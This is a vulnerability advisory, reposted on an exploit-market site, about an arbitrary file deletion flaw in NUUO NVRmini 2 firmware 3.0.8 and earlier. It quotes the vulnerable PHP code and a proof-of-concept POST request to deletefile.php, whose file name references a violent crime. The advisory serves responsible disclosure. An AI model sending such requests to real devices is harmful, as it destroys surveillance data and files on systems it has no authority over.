[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion

Author
LiquidWorm
Risk
[
Security Risk High
]
0day-ID
0day-ID-25215
Category
web applications
Date add
05-08-2016
Platform
php
NUUO Arbitrary File Deletion Vulnerability
 
 
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8
 
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
 
Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly
sanitised before being used to delete files. This can be exploited to delete files
with the permissions of the web server using their absolute path or via directory
traversal sequences passed within the affected POST/GET parameter.
 
==================================================================
/deletefile.php:
----------------
 
1: <?php
2: $filename=$_POST['filename'];
3: unlink($filename);
4: if (file_exists($filename))
5:         echo "fail";
6: else echo "true";
7: ?>
 
==================================================================
 
Tested on: GNU/Linux 3.0.8 (armv7l)
           GNU/Linux 2.6.31.8 (armv5tel)
           lighttpd/1.4.28
           PHP/5.5.3
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
 
Advisory ID: ZSL-2016-5353
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php
 
 
14.01.2016
 
--
 
 
POST /deletefile.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
 
filename=He_molested_murdered_and_mutilated_her.mp4

#  0day.today [2024-12-25]  #